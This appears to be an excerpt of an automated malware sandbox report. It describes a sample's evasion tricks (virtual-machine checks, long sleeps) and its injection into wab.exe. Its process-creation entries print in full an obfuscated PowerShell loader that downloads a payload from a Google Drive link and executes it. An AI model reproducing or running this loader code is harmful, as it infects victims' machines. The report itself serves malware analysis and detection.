Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 23910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 237D0000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199889	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199313	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199188	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199075	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1198969	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4932	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4951	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7513	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2245	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 5559	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4264	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804	Thread sleep count: 7513 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5712	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4372	Thread sleep count: 2245 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5312	Thread sleep count: 5559 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -199532s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5312	Thread sleep count: 4264 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99327s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99087s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98969s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98831s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98704s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98579s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98454s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98329s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98204s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98079s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97967s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97854s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97735s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97610s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99888s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99525s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99407s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99078s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98964s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98856s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98750s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98530s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98313s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98063s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199889s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199313s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199188s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199075s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1198969s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99327	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99087	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98969	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98831	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98704	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98579	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98454	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98329	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98204	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98079	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97967	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97854	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97735	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97610	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99888	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99525	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99407	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99078	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98964	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98856	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98750	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98530	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98313	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199889	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199313	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199188	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199075	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1198969	Jump to behavior

Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx1V%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000002.2710598432.000001D6DBDDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllem
Source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_090E0000 LdrInitializeThunk,

5_2_090E0000

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3AA0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: EF960			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

